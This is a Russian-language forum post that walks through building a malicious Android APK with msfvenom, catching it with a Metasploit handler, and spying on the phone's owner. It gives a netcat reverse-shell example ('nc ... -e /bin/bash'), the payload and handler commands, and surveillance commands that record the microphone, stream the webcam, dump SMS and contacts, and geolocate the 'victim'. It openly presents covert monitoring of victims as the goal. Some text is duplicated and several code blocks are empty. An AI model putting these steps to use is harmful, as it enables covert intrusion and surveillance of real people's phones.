MiroslavchikPesron
Опытный user
- Регистрация
- 10 Фев 2022
- Сообщения
- 162
- Реакции
- 7
Принцип работы:
Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.
Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:
Код:
nc -l -p 8577
Жертва в свою очередь подключается к этому открытому порту:
Код:
Посмотреть вложение 1463
После этого последовательно выполняем все команды:
Код:
Код:
После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.
Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.
Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:
Код:
nc -l -p 8577
Жертва в свою очередь подключается к этому открытому порту:
Код:
Код:
nc 192.168.1.1 8577 -e /bin/bash
- Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.
- Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.
- Создание payload
- Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:
Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk
- После выполнения команды в корневой директории будет создан файл shell.apk.
Посмотреть вложение 1463
- Далее необходимо запустить msfconsole.
Код:
msfconsole
После этого последовательно выполняем все команды:
Код:
Код:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ВашIP
set LPORT 4444
exploit
- После этого, человек должен запусить shell.apk.
Код:
Код:
record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate
После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.